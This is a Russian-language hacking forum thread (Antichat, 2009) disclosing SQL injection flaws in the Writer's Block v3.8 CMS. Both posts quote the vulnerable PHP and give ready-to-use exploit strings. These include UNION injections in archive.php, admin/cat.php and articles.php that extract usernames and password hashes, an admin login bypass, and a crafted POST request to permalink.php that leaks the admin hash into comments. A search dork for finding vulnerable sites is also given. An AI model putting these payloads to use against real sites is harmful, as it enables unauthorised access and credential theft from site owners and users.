ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости Writer's Block v3.8
  #1  
Старый 30.04.2009, 10:22
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости Writer's Block v3.8

Уязвимости Writer's Block v3.8
download: http://www.desiquintans.com/writers-block/downloads/writersblock-current.zip
dork: "Published by Writer’s Block"

SQL-injection

1) archive.php (требования: magic_quotes=off)
уязвимый код:
PHP код:
if(isset($_GET['cat'])) {
## Check if category exists
    
$check strpos($_GET['cat'], '+');     //это, какбе, защита от инъекций, походу =)
    
$check .= strpos($_GET['cat'], '%20');  //
    
if(!$check) {
        
$getinfo mysql_query("SELECT PCatID, PostCatName, PostDesc FROM ".POSTCAT_TBL." WHERE PostCatUrl='".$_GET['cat']."'");
    } 
эксплуатирование:
Код:
archive.php?cat=-1'/**/union/**/select/**/1,concat_ws(0x3a,UserName,Password),3/**/from/**/wb_users/*


2) /admin/cat.php (требования: доступ в админ панель)
уязвимый код:
PHP код:
elseif ($_GET['action'] == 'edit') {
    if (isset(
$_GET['PCatID'])) {
        
## Edit post category
        
$pagetitle 'Edit Post Category';
        include (
'include/head.htm');

        
$retrieve mysql_query ("SELECT * FROM ".POSTCAT_TBL." WHERE PCatID=".$_GET['PCatID']); 
эксплуатирование:
в этой инъекции мк=офф уже не обязательно, но в админку еще попасть надо =)...
Код:
admin/cat.php?action=edit&PCatID=1+union+select+1,2,3,version(),5--

Bypass (требования: magic_quotes=off)
уязвимый код:
/admin/login.php
PHP код:
if($_POST['login']) {
    
$error NULL;
    if(empty(
$_POST['username']) or strpos($_POST['username'], ' ')) {
        
$u FALSE;
        
$error .= '<p align="center"><img src="include/img/failure.png" width="16" height="16" alt="" /> Invalid username.</p>';
    } else {
        
$u =& $_POST['username'];
    }
    if(empty(
$_POST['password']) or strpos($_POST['password'], ' ')) {
        
$p FALSE;
        
$error .= '<p align="center"><img src="include/img/failure.png" width="16" height="16" alt="" /> Invalid password.</p>';
    } else {
        
$p =& $_POST['password'];
    }

    if(
$u and $p) {
        
$get_user_auth mysql_query("SELECT UserID, UserName, Password FROM ".USERS_TBL." WHERE UserName='$u' AND Password='".md5($p)."'"); 
эксплуатирование:
идем в /admin/login.php и вбиваем:

Username:'/**/or/**/1=1/*
Password:<any symbols without space>

Последний раз редактировалось Iceangel_; 30.04.2009 в 10:26..
 
Ответить с цитированием

  #2  
Старый 29.12.2009, 20:06
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Version: 3.8

SQL Injection

Vuln file: articles.php
PHP код:
/*...*/
if(isset($_GET['page'])) {
## Check if the Anypage exists
    
$check strpos($_GET['page'], '+');
    
$check .= strpos($_GET['page'], '%20');
    if(!
$check) {
        
$showpage mysql_query("SELECT Title, Subheading, PageDesc, PageBody, AnyCat1, AnyCat2, AnyCat3, AnyCat4, Author, Timestamp FROM ".ANYPAGE_TBL."
            WHERE UrlName='"
.$_GET['page']."'");
    }
/*...*/ 
Exploit:
Код:
http://[host]/[path]/articles.php?page=1'+union+select+null,concat_ws(0x3a,UserName,Password),null,null,null,null,null,null,null,null+from+wb_users+where+UserID=1+--+
Vuln file: permalink.php
PHP код:
/*...*/
        
$comment_sent mysql_query("INSERT INTO ".COMMENTS_TBL." (PostID, Name, Email, Url, Body, Timestamp) VALUES
        ('"
.$_POST['PostID']."', '".strip_tags($_POST['name'])."', '".strip_tags($_POST['email'])."', '$url', '".nl2br($comment)."', 
            '"
.time()."')");
/*...*/ 
Exploit:
Код:
POST http://[host]/[path]/permalink.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

PostID=1
&name=Antichat.ru
&email=admin@lol.lol
&url=xek',(select concat_ws(0x3a,UserName,Password) from wb_users where UserID=1),'A')/*
&comment=Hello World
&submit=Say%20this
смотрим логин:хэш админа в комментах

Для успешной эксплуатации уязвимостей необходимо:
magic_quotes = OFF
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ